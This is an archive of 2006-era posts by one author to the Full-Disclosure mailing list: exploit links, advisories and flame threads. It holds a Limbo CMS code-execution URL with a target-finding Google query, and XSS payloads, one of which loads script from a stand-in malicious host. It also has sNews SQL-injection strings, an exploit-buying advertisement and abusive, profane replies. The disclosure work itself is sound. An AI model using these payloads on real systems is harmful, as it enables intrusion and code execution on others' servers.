[Full-disclosure] NVIDIA Linux/BSD/Solaris Drivers Local Root Buffer Overflow

2006-10-16 Thread Alexander Hristov
NVIDIA Linux/BSD/Solaris Drivers Local Root Buffer Overflow
KNOWN VULNERABLE:
o NVIDIA Driver For Linux v8774
o NVIDIA Driver For Linux v8762

PROBABLY VULNERABLE:
o NVIDIA Driver for FreeBSD
o NVIDIA Driver for Solaris
o Earlier versions

KNOWN FIXED:
o None

http://securitydot.org/xpl/exploits/vulnerabilities/articles/1714/exploit.html
-- 
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Mcafee Network Agent (mcnasvc.exe) Remote DoS

2006-10-12 Thread Alexander Hristov
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html
-- 
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



[Full-disclosure] Google Earth (kml & kmz files) buffer overflow

2006-10-12 Thread Alexander Hristov
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1660/exploit.html
-- 
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



Re: [Full-disclosure] George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment

2006-08-27 Thread Alexander Hristov

On 8/27/06, php0t <[EMAIL PROTECTED]> wrote:

This is probably the funnier part, whatever is causing it

"[ Illegal characters in file path:
/home/system/www/bbcone/listings/nav_today">"



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Thierry
Zoller
Sent: Sunday, August 27, 2006 10:13 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] George Bush appoints a 9 year old to be
the chairperson of the Information Security Deportment



XSS ;)



--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7





--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



[Full-disclosure] Samba Internal Data Structures DOS Vulnerability Exploit

2006-07-20 Thread Alexander Hristov

Name : Samba Internal Data Structures DOS Vulnerability Exploit
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1175/exploit.html
Date :  2006-07-21
Vulnerability :
http://securitydot.net/vuln/exploits/vulnerabilities/articles/18014/vuln.html
PATCH : 
http://us4.samba.org/samba/ftp/patches/security/samba-3.0-CAN-2006-3403.patch
It might not work on some systems.
Enjoy
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



[Full-disclosure] Webmin / Usermin Arbitrary File Disclosure Vulnerability Perl

2006-07-14 Thread Alexander Hristov

This time coded on perl
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html
Date :  2006-06-30
Patch : update to version 1.290
Advisory : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1164/exploit.html

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



[Full-disclosure] Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit

2006-07-09 Thread Alexander Hristov

Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html
Date :  2006-06-30
Patch : update to version 1.290
Advisory : 
http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



[Full-disclosure] Windows Live Messenger 8.0 ( Contact List *.ctt ) Heap Overflow

2006-06-25 Thread Alexander Hristov

Author:JAAScois
Date:  25.6.2006
Type:  Heap Overflow
Product:   http://live.com , http://messenger.msn.com
Patch: N/A
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1108/exploit.html
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



[Full-disclosure] OpenOffice.org XSS

2006-06-13 Thread Alexander Hristov

Author:XiON
Date:  JUN1406
Type:  XSS
Product:   http://www.openoffice.org/
Patch: N/A
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1060/exploit.html
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



Re: [Full-disclosure] n3td3v bashers on FD

2006-06-09 Thread Alexander Hristov

Good point about symantec
On 6/3/06, n3td3v <[EMAIL PROTECTED]> wrote:

We're the biggest security group around, there's nothing you can say to
change that. We are professionals who work at the major dot-coms and
earn all the money, you people are just stupid. You call us lame but
look at you. None of you have released vulnerabilities. None of you are
at the cutting edge of hacking, we're at the frontline of new tactics
to hack application and network security. You guys are just the people
sitting and waiting for hackers to post code so you can write about us
on securityfocus.com and news.com. Joris Evers and Robert Lemos
(Symantec/CNET) are making money out of everything posted on this
list, that's why they are multi million dollar corporations. They hate
to see this list disrupted, because they can't make money while n3td3v
bashing activity is underway. They hate to see their profit margins
dipping, they don't like to see their mail box filled with propaganda
for the biggest international non-profit group around. They want us to
leave the list so they can make money from their software to sell to
people. We're seen as the enemy...
Not only do Symantec and CNET hate us, script kids hate us as well,
because while the bashing is going on, no one is posting "free exploit
code" for them to deface web sites with. Hahaha. The Script kids and
Symantec/CNET are the ones who hate n3td3v, all the real hackers are
on the side of n3td3v, it's all about money at the end of the day. The
people who can hack their own zero-day don't care if n3td3v posts to
FD or not, it's only script kids and Symantec CNET who care, because
without FD, they wouldn't have any other source of information to know
what's going on. These people need FD, it's like a life line to them, if
it wasn't for FD, Symantec wouldn't know what was going on and neither
would CNET, they wouldn't know what hackers were up to without FD and
Bugtraq list.





--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



[Full-disclosure] Howto filter n3td3v from your mail client

2006-04-01 Thread Alexander Hristov
First u have to go to preferences then click on :

Gay filter on
Asshole filter on
Noob filter on
Kiddie filter on

Thats all

WARNING : U have to check all of them so the mail client can filter
n3td3v , otherwise youll receive mails

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



Re: [Full-disclosure] Noise

2006-03-29 Thread Alexander Hristov
Hey n3td3v have u ever considered brain surgery like brain
transplantation or something like that ? I think it might help ! Try
your favourite search engine yahoo for searching more info about that
ok ?

On 3/30/06, n3td3v <[EMAIL PROTECTED]> wrote:
>
> Let's hear your story then, I bet that's a lot more interesting, right? Let's
> see, you grew up in a balanced family and social background, went to private
> school, finished all your exams, went to university, studied computer
> science etc and then had the big piece of paper to say you can analyse code
> and find vulnerabilities. Or you become the big router/network guy and can
> headoff the biggest DNS or DDoS attack the world can throw at you...let's
> hear your story, if you even have the confidence to expose that to the
> public...yet you think you can bash me. People with real knowledge of new
> methodology of hacking never came from university graduates, it has come
> from bored, unemployed folks, that people like you might describe as losers.
> But to be honest, you guys you discredit, are actually the guys keeping you
> in a job.
>
>
>
> On 3/30/06, Scott T. Cameron <[EMAIL PROTECTED]> wrote:
> > On Wed, Mar 29, 2006 at 11:56:48PM +0100, n3td3v wrote:
> > > I finished school 11 years ago, in fact I left on my own accordance (when I
> > > was 14) because they were going to chuck me out of school anyway. I soon got
> > > involved in stealing cars, breaking into houses, and taking goods from
> > > shops. All my criminal friends went to jail, I was the only one left. I
> > > started using computers to pass the time (when I was 18) when having "no one
> > > left to hang about with", and I used my knowledge of criminality to work out
> >
> > 
> >
> > Highly uninteresting.
> >
>
>
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



[Full-disclosure] (no subject)

2006-03-27 Thread Alexander Hristov
IM not saying the entire disk !
Only the partition u choose the torrent to be saved in has to be full
Like when u have 14 partitions and one of them is full i dont think
this is a problem ? So this is a security bug

On 3/27/06, Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> This really doesn't seem like a security bug though... sure some site
> could target opera users and try to force them to download torrents,
> but when your disk is already full this sounds like the least of your
> problems...
>
> -sb
>
> On 3/27/06, Alexander Hristov <[EMAIL PROTECTED]> wrote:
> > Opera > 8.02 with torrent support cant handle not enough space on drive
> >
> > If your partition is full and u choose to save a torrent on this
> > partition opera will start using 100% of your cpu and memory and
> > eventually crash
> >
> > Tested with opera 9 p 2
> > --
> > Best Regards,
> > Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
> >
> >
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



[Full-disclosure] Opera > 8.02 with torrent support cant handle not enough space on drive

2006-03-27 Thread Alexander Hristov
Opera > 8.02 with torrent support cant handle not enough space on drive

If your partition is full and u choose to save a torrent on this
partition opera will start using 100% of your cpu and memory and
eventually crash

Tested with opera 9 p 2
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-24 Thread Alexander Hristov
Im very surprised too

On 3/24/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> I would be surprised to see a law that says it is bad to give other
> peoples work away for free but ok to sell that work?
>
> Something doesn't smell right in France and its not the cheese.
>
> On Fri, 24 Mar 2006 10:16:06 -0800 "CIRT.DK Mailinglists"
> <[EMAIL PROTECTED]> wrote:
> >I would rather say that they are using the law as an excuse, since they
> >could have gotten the DB with all the exploits host in another country.
> >
> >Just my opinion
> >
> >/Dennis
> >
> >-Original Message-
> >From: [EMAIL PROTECTED]
> >[mailto:[EMAIL PROTECTED] On Behalf Of
> >Juha-Matti
> >Laurio
> >Sent: Friday, March 24, 2006 6:14 PM
> >To: full-disclosure@lists.grok.org.uk
> >Subject: Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale
> >
> >FrSIRT is officially pointing to local laws now; their Exploits section
> >redirects to the following statement
> >
> >"In conformity with applicable French laws prohibiting Full-disclosure"
> >including link to the official legifrance.gouv.fr document.
> >
> >http://www.frsirt.com/exploits/
> >
> >- Juha-Matti
> >
>
>
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



Re: [Full-disclosure] Phun! Search

2006-03-24 Thread Alexander Hristov
YEAH URE THE BEST
I think in the school u learn they call u geek right ? because u act
like u understand something ?
On 3/24/06, n3td3v <[EMAIL PROTECTED]> wrote:
> Read http://en.wikipedia.org/wiki/Hacktivism learn ;-)
>
>
>
> On 3/24/06, Alexander Hristov <[EMAIL PROTECTED]> wrote:
> > Im wondering when will u grow up and stop writing shits on FD ?
>
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



Re: [Full-disclosure] Phun! Search

2006-03-23 Thread Alexander Hristov
Im wondering when will u grow up and stop writing shits on FD ?

On 3/24/06, n3td3v <[EMAIL PROTECTED]> wrote:
> Lol, and even with your idea, that would open up a great Yahoo phishing
> vector. You mean "anyone" can edit a legitimate Yahoo webpage with the name
> "n3td3v" on it and have it cached on Yahoo servers. I believe thats called
> "DEFACEMENT" of a corporate webpage. Even with your idea, thats still
> headline news. Now wheres Robert Lemos and Joris Evers, or are they too
> scared to mention the 'n3td3v' alias on public news sites, yes they are.
>
>
>
> On 3/23/06, n3td3v <[EMAIL PROTECTED]> wrote:
> >
> > The document is cached on Yahoo Slurp, you explain that, smart guy ;-)
> >
> >
> > On 3/23/06, Bernhard Mueller <[EMAIL PROTECTED] > wrote:
> > > Hello,
> >
> >
> > >
> >
> > There's no need at all to cache anything at all.
> >
> >
> > Sorry to tell you, but there is no vulnerability involved here
> >
> >
> > --
> > Bernhard
> >
> >
> >
> >
> >
>
>
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >




Re: FW: [Full-disclosure] Noise on the list

2006-03-21 Thread Alexander Hristov
Its hard to be guy ah n3tshit ?

Bob Hacker wrote:

> i need help with resume for monster if gobbles out there plz send
> resume in sparc 64 asm !!!
> !Z
> n3tdev is my her0 with a zer0 !! YAY !! YAY ! LOOK IM ON FD AND YOUR
> READING THIS YAY !
> YAY ! YAY ! YAY YAY YAY YAY YAY YAY Leave the list alone you predator
> you !! YAY YAY
> this is alex's list he will morderate you with tcp wrappers YAY 
> he will filter his incoming subscriotion lists of 12 to 11 yay !
> n3td3v is my her0 YAY ! !! !! !Z !Z
> !Z !
> !Z
> !Z
>
>  
> On 3/21/06, *Alexander Hristov* <[EMAIL PROTECTED]> wrote:
>
> NETSHITDEV OR WHATEVER JUST SHUT THE FUCK UP URE A STUPID ASSHOLE SHUT
> THE FUCK UP AND LEAVE THE LIST ALONE
>
> n3td3v wrote:
>
> > And the "experts" come on FD insulting the people who post info, and
> > then expect us to post more for you to learn about? Why don't you just
> > get back to your ac or maybe people will stop posting to FD.
> >
> > If you bite the hand that feeds you, you know what will happen.
> >
> >
> > On 3/21/06, *Michael Tewner* <[EMAIL PROTECTED]> wrote:
> >
> > Ummm... This list is as much learning of vulnerabilities as posting
> > them. This is DISCLOSURE.
> >
> > n3td3v wrote:
> > > You've never released any vulnerabilities for Google, Yahoo, or any
> > > other vendor, yet you think you have more right to be here than the
> > > people you class as the "idiots".
> > >
> > > n3td3v
> > >
> > > On 3/21/06, *Edward Pearson* <[EMAIL PROTECTED]> wrote:
> > >
> > > My friend,
> > > I posted an e-mail about this kind of thing a few months back. I was
> > > saddened to see no effect. I have something like 600 unread e-mail in my
> > > FD box, I'd say around 200 of them MAY be worth reading.
> > >
> > > I used to love this list, I subscribe to Bugtraq now. Nuff said.
> > >
> > > Ed
> > >
> > >
> > >
> >
> 
>
> > >
> >
> >
> >
>
> >
> >
>
>
>



Re: FW: [Full-disclosure] Noise on the list

2006-03-21 Thread Alexander Hristov
NETSHITDEV OR WHATEVER JUST SHUT THE FUCK UP URE A STUPID ASSHOLE SHUT
THE FUCK UP AND LEAVE THE LIST ALONE

n3td3v wrote:

> And the "experts" come on FD insulting the people who post info, and
> then expect us to post more for you to learn about? Why don't you just
> get back to your ac or maybe people will stop posting to FD.
>  
> If you bite the hand that feeds you, you know what will happen.
>
>  
> On 3/21/06, *Michael Tewner* <[EMAIL PROTECTED]> wrote:
>
> Ummm... This list is as much learning of vulnerabilities as posting
> them. This is DISCLOSURE.
>
> n3td3v wrote:
> > You've never released any vulnerabilities for Google, Yahoo, or any
> > other vendor, yet you think you have more right to be here than the
> > people you class as the "idiots".
> >
> > n3td3v
> >
> > On 3/21/06, *Edward Pearson* <[EMAIL PROTECTED]> wrote:
> >
> > My friend,
> > I posted an e-mail about this kind of thing a few months back. I was
> > saddened to see no effect. I have something like 600 unread e-mail in my
> > FD box, I'd say around 200 of them MAY be worth reading.
> >
> > I used to love this list, I subscribe to Bugtraq now. Nuff said.
> >
> > Ed
> >
> >
> >
> 
> >
>
>
>
>
>



Re: [Full-disclosure] Links to Google's cache of 626 FrSIRT exploits

2006-03-20 Thread Alexander Hristov
U can check and http://securitydot.net/exploits.php

[EMAIL PROTECTED] wrote:

>So you never recursively sucked FrSIRT.com before the public exploits section 
>was "definitively closed" well we're in luck (at least for a little while) 
>because Google did.
>
>This page links to Google's cache of 626 FrSIRT exploits
>
>http://www.elsenot.com/frsirt-google.html
>
>
>
>  
>



[Full-disclosure] Skype emoticons problems and vulnerabilities

2006-03-11 Thread Alexander Hristov
Affected versions : 1.x ( not tested on 2.x )
Skype is vulnerable to dos using the emoticons when u do a bigger
enough list of them like this :

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


[Full-disclosure] Skype emoticons problems / bugs

2006-03-06 Thread Alexander Hristov
Skype 1.x ( havent tested on 2.x ) windows version has problems with
emoticons when there is a big enough list of them like this :
When the user opens the chat window with the icons skype will stop
responding and crash

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


[Full-disclosure] Igloo-FTP Pro Problems

2006-03-06 Thread Alexander Hristov
As u can see at the screenshot provided below iglooftp cant work with
files that are bigger than 2gb - even the transfer of the file fails
screenshot : http://securitydot.net/iglooftp-problems.png
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


Re: [Full-disclosure] Please remove me from the list

2006-03-04 Thread Alexander Hristov
U can remove yourself from here :
https://lists.grok.org.uk/mailman/listinfo/full-disclosure

On 3/4/06, W1nd man <[EMAIL PROTECTED]> wrote:
>
>
>
> Please remove me from the list
>
>
> 
>
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


Re: [Full-disclosure] DSplit - Tiny AV signatures Detector

2006-03-04 Thread Alexander Hristov
Well clamav is the best AV for no money and its very good developed
again for no money :)
On 3/4/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>
> and it clearly shows clamav is a crap antivirus where the tools like
> DSplit are a problem for them,
> and they will detect DSplit when they can't find a better way to
> detect virus.
>
>
>
> Alexander Hristov wrote:
> > Clamav detects it and can unrar it with the unrar module
> >
> > On 3/3/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> > DSplit is the small brother of an old tool known as UKsplitter, which
> > is now abandoned, does not work in VMware, and fails to run under
> > Windows 2003.
> >
> > DSplit has been coded for persons like me, targeted by AV firms, and
> > I'm not responsible for the bad uses of it. I recall this method has
> > been known for a long time and it's up to the AV firms to review their
> > detection software.
> >
> > http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> >  http://getdsplit.class101.org
> >
> > usual critics , flames, can be directly sent to the Recycle Bin :>
> >
> >> -- Best Regards, Aleksander Hristov < root at securitydot.net > <
> >> http://securitydot.net >
> >
> >
> >
> >
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


Re: [Full-disclosure] DSplit - Tiny AV signatures Detector

2006-03-03 Thread Alexander Hristov
Clamav detects it and can unrar it with the unrar module

On 3/3/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> DSplit is the small brother of an old tool known as UKsplitter, which is
> now abandoned, does not work in VMware, and fails to run under Windows 2003.
>
> DSplit has been coded for persons like me, targeted by AV firms, and
> I'm not responsible for the bad uses of it. I recall this method has been
> known for a long time and it's up to the AV firms to review their detection
> software.
>
> http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> http://getdsplit.class101.org
>
> usual critics , flames, can be directly sent to the Recycle Bin :>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


Re: [Full-disclosure] Re: Arin.net XSS

2006-03-03 Thread Alexander Hristov
Just tested : 
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
it still works for me

On 3/3/06, Dave Korn <[EMAIL PROTECTED]> wrote:
> "Terminal Entry" <[EMAIL PROTECTED]> wrote in message
> news:[EMAIL PROTECTED]
>
> > Notification
> > Multiple attempts to contact Arin site administrators went unanswered
>
>   Looks like someone was paying at least some attention, because none of
> your examples worked when I tried them just now.
>
> > Some demonstration exploit URLs are provided:
> > http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>
> No match found for .
>
> > http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
>
> No match found for  SRC=http://maliciousCode.net/exploit.js>.
>
> [  Funnily enough it goes bold after 'SRC=' and the rest of the thing turns
> into a borken link to "http://maliciousCode.net/exploit.js>"  ]
>
> > http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>
>  No match found for .
>
> cheers,
>   DaveK
> --
> Can't think of a witty .sigline today
>
>
>
>
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


Re: [Full-disclosure] New MSN Servers

2006-03-03 Thread Alexander Hristov
It's really stupid to believe that MSN doesn't have load balancing and
has only one server
On 3/3/06, ZeuZ <[EMAIL PROTECTED]> wrote:
> Hi everybody, yesterday I was about to update something in my MSN Space and
> I found out something... Suddenly logginet.passport.com redirected me to
> www.msn-int.com (65.54.202.62) and at first I thought it was some kinda
> spyware, so I switched to Linux and tried again, and again the same... So I
> decided to check it out with Nmap and I found out this:
>  Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-03-04 03:03
> CET
>  DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0,
> SF: 0, TR: 1, CN: 0]
>  Initiating SYN Stealth Scan against 65.54.202.62 [1672 ports] at 03:03
>  Discovered open port 80/tcp on 65.54.202.62
>  SYN Stealth Scan Timing: About 26.67% done; ETC: 03:05 (0:01:22 remaining)
>  The SYN Stealth Scan took 102.54s to scan 1672 total ports.
>  Initiating service scan against 1 service on 65.54.202.62 at 03:05
>  The service scan took 7.10s to scan 1 service on 1 host.
>  Warning:  OS detection will be MUCH less reliable because we did not find
> at least 1 open and 1 closed TCP port
>  For OSScan assuming port 80 is open, 39518 is closed, and neither are
> firewalled
>  For OSScan assuming port 80 is open, 38324 is closed, and neither are
> firewalled
>  Insufficient responses for TCP sequencing (3), OS detection may be less
> accurate
>  For OSScan assuming port 80 is open, 41733 is closed, and neither are
> firewalled
>  Host 65.54.202.62 appears to be up ... good.
>  Interesting ports on 65.54.202.62:
>  (The 1671 ports scanned but not shown below are in state: filtered)
>  PORT   STATE SERVICE VERSION
>  80/tcp open  http    Microsoft IIS webserver 6.0
>  Device type: firewall
>  Running (JUST GUESSING) : Netscreen ScreenOS (85%)
>  Aggressive OS guesses: Netscreen 5XP firewall+vpn (os 4.0.3r2.0) (85%)
>  No exact OS matches for host (test conditions non-ideal).
>
>  TCP Sequence Prediction: Class=constant sequence number (!)
>   Difficulty=0 (Trivial joke)
>  IPID Sequence Generation: All zeros
>  Service Info: OS: Windows
>
>  Nmap finished: 1 IP address (1 host up) scanned in 140.366 seconds
> Raw packets sent: 3421 (153KB) | Rcvd: 2069 (98.1KB)
>
>
>  So, literally the MSN network is diverting Spaces users' data through some
> firewall to another host, perhaps just to increase something in users'
> accounts...
>  I also checked with a traceroute the hops it was making... Until hop
> 21 there was no coincidence, different routers and different gateways
> in the process... but then they started to center on SAAVIS (both MSN.ES
> and MSN-INT.COM)
>  Now, should this be considered a mere new Microsoft idea or is it just a
> problem that I'm having?
>  Maybe it's just me, but I want to be sure; it seems as if Microsoft was
> about to change its system network once again
>
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


[Full-disclosure] Limbo CMS code execution

2006-02-28 Thread Alexander Hristov
Official page : http://www.limbo-cms.com/

Vulnerable : Limbo 1.*

Fix : No

Bug : 
http://somehost/path-to-limbo/index.php?option=frontpage&Itemid=system(CODE)

example : index.php?option=frontpage&Itemid=system(uname)

Google search string : inurl:"option=frontpage"

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


[Full-disclosure] Norton Monitoring system funny problems

2006-02-25 Thread Alexander Hristov
Norton Internet monitoring tools issues
Versions Affected : *
Fix : No

What I'm writing about is how to stop the internet of some user that is
using the Norton tools and IRC / any other chat at the same time.

By default Norton monitor checks for words like "keylogger" , "start
keylogger" , "key logger" etc.

Example for IRC :
Start mIRC or any other IRC client that you like and connect to some server.
Type /ctcp yournick start keylogger . By default Norton monitors
your mIRC process and its logs, so it sees "start keylogger" and
automatically blocks mIRC.exe from starting and automatically blocks port
6667 or whatever port you're using to connect to IRC. Nice eh ?

Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


[Full-disclosure] XSS and SQL injection in sNews

2006-02-14 Thread Alexander Hristov
Official page : http://www.solucija.com/home/snews/

XSS in comments :

just post some comment with alert('XSS TEST by
securitydot.net');

FIX : put this on line 423
// encode angle brackets in the comment text before it is displayed
$r = str_replace ("<","&lt;",$r);
$r = str_replace (">","&gt;",$r);

Injection through categories : index.php?category=1%20or%201=2

FIX : put this on line 313
if (ereg('^[0-9]*$' , $category))

Injection through id : index.php?id=0%20or%201=2

FIX : put this on line 175
if (ereg('^[0-9]*$' , $id)) {

--
Securitydot.net
joffer and DrFrancky
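
The two kinds of fix in the post above, as an added example that is not part of the original post or of sNews: output encoding with htmlspecialchars() rather than replacing only the angle brackets, and an integer check plus a bound parameter rather than the ereg() test alone. It is written for current PHP with the pdo_sqlite extension; the articles table and all function names are assumptions.

```php
<?php
// Added example, not sNews code. Table and column names are hypothetical.

// Encode comment text on output. Unlike replacing only "<" and ">", this also
// encodes "&" and both quote characters, so it holds inside attribute values.
function encode_comment(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Strict integer check for id/category. Unlike ^[0-9]*$ it rejects the empty
// string, and the caller gets a PHP int rather than the original string.
function parse_id($value): ?int
{
    $id = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $id === false ? null : $id;
}

// Parameterized lookup: the id is bound as data, never concatenated into SQL.
function find_article(PDO $db, $rawId): ?array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null;                       // malformed id: do not query at all
    }
    $stmt = $db->prepare('SELECT id, title FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO articles (id, title) VALUES (1, 'Hello'), (2, 'Draft')");

// Inputs: one valid id, the two query strings from the post (URL-decoded),
// and an empty value.
foreach (['1', '1 or 1=2', '0 or 1=2', ''] as $input) {
    $row = find_article($db, $input);
    printf("%-12s => %s\n", var_export($input, true), $row ? $row['title'] : 'rejected');
}

echo encode_comment('<b title="x">Tom & \'Jerry\'</b>'), "\n";
```

Only the first input reaches the database; the encoded comment prints with every markup character replaced by its entity.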



[Full-disclosure] Exploits Selling / Buying

2005-06-06 Thread Alexander Hristov
Hello list,

We would like to announce a new service to the security community at
securityfocus,
it's about buying new, private exploits.
So if you are looking to profit from your findings - the place is
irc.exploits.cx, the main chan is #exploits; details can be found in
the /motd or you could just ask in the main channel.

Our IRC network also supports ssl - irc.exploits.cx port: 


We're looking forward to seeing you online!


best regards,
exploits.cx staff